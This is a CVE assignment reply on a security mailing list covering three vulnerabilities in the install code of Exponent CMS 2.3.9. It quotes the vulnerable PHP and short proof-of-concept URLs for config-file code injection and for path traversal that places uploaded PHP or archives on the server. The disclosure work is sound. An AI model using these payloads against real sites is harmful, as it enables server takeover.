Re: CVE Request - Exponent CMS 2.3.9 multi-vulnerabilities in install code

[cve-assign () mitre org]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

> all vulnerabilities have been fixed.
> https://exponentcms.lighthouseapp.com/projects/61783/changesets/4ae457ff1bf80e8b61286cd125ca794b25564e86
> https://github.com/exponentcms/exponent-cms/commit/4ae457ff1bf80e8b61286cd125ca794b25564e86

> 1. Arbitrary code execution
> https://github.com/exponentcms/exponent-cms/blob/master/install/index.php#L56-L63
>
> lines 56 - 63
> if (isset($_REQUEST['sc'])) {
>     if (file_exists("../framework/conf/config.php")) {
>         // Update the config
>         foreach ($_REQUEST['sc'] as $key => $value) {
> //            $value = expString::sanitize($value);
>             expSettings::change($key, $value);
>
> The function of the expSettings::change() is to modify the config
> file("framework/conf/config.php"), but there is failed to filter user input
> lead to we could write anything to config file.
>
> Proof of concept:
> http://www.exponentcms.org/install/index.php?sc[SMTP_PORT]=25\\');phpinfo();//

Use CVE-2016-7565.


> 2. RCE vulnerability
> https://github.com/exponentcms/exponent-cms/blob/master/install/index.php#L47-L53
>
> if (isset($_REQUEST['profile'])) {
>     expSettings::activateProfile($_REQUEST['profile']); //here
>     expTheme::removeSmartyCache(); //FIXME is this still necessary?
>     expSession::clearAllUsersSessionCache();
>     flash('message', gt("New Configuration Profile Loaded"));
>     header('Location: ../index.php');
>
> expSettings::activateProfile() :
> https://github.com/exponentcms/exponent-cms/blob/master/framework/core/subsystems/expSettings.php#L587-L593
>
> copy(BASE . "framework/conf/profiles/$profile.php", BASE .
> "framework/conf/config.php"); //here
> // tag it with the profile name
> $fh = fopen(BASE . "framework/conf/config.php", "a");
>
> We can upload a "php" file to website, then copy it to
> "framework/conf/config.php"
>
> Proof of concept:
> first, We first upload a "php" to website (by "uploader_paste.php"), such
> as /files/test.php
> then visit
> http://www.exponentcms.org/install/index.php?profile=../../../files/test,
> then will copy "/files/test.php" to "framework/conf/config.php".

Use CVE-2016-7790.


> 3. File Upload vulnerability
> https://github.com/exponentcms/exponent-cms/blob/master/install/index.php#L77-L94
>
> $files = BASE . "themes/" . DISPLAY_THEME_REAL . "/" .
> $_REQUEST['install_sample'] . ".tar.gz";
> if (!file_exists($files)) {
>     $files = BASE . "install/samples/" . $_REQUEST['install_sample'] .
> ".tar.gz"; //here
> }
> if (file_exists($files)) { // only install if there was an archive
>     include_once(BASE . 'external/Tar.php');
>     $tar = new Archive_Tar($files); //Extract .tar.gz file
>     $return = $tar->extract(BASE);
>
> The function of those code is extract .tar.gz file, but through
> "install_sample", the parameter of "$files" is what we can control, so we
> could upload a .tar.gz evil file, then extract it.
>
> Proof of concept:
> first, upload .eql and .tar.gz files(by "uploader_paste.php"),such as
> /files/10.tar.gz
> then visit
> http://www.exponentcms.org/install/index.php?install_sample=../../files/10
> Successfully extract file:  http://www.exponentcms.org/3.php

Use CVE-2016-7791.

- -- 
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
[ A PGP key is available for encrypted communications at
  http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJX7RG1AAoJEHb/MwWLVhi2pZkQAJRFr64onRqH1X8szNhLnXxK
P4wUTDrFEpwmXzj6yx+acEQKrUVcvT+a3Gc1iLyGm84nYKi4z0HNdwRAisGLSAcX
bfkumAuGD2I40wBgIrGisVNYJCb/DML7SDsiV/fNd+BRjqhCDW5qNLOnoRNof/g5
rP2i5RPIVyuc2aZpnqG0PGzFM8Y51i3igltII52SYBdC/QzWc5nJHsCGfDfzNoHb
zTIBDCP8hhSbFykCnBAzRmuV7OZ1cuivb23/M4+Mr4z3ypipkE3YpiOpYLO2fVYA
4qFRBpTRXfRPRaf8XZDs4PCujxLBWGANRlJyPQrgU3ZfaerjJwzdombZ6Ovick8V
f62Y30Nn8kxKAx3YzODBVpXUGJV+Y+vlhF9KRR1pKAFzH1LG3CFiZGYn44b9R246
wvbO/FyQMlYdpYBFFr/KmJPvX7iJoG9UM/EB3phZM8Zu/U3srV3lZMhaYqRsuQ4d
TkVaG7L8vr88t9vz5MU/1Gdhm74XcEvC2ri9Lo2f8aSaR6kDZHbWD3TX6YP70Jb4
SK76W99bObEQEKEFSQzUt5MJXg5yDUwuUDzd1Jbf60jE34U5+So2zuEpYzbAwArL
bVmrI8NDd36uwDDWYPlFEew1WcdIJhwvIuSn8FVbeEZ4/kBWBGg0G12Z0shnNDA6
SnpHQbiV+p//Cynfztk6
=Rett
-----END PGP SIGNATURE-----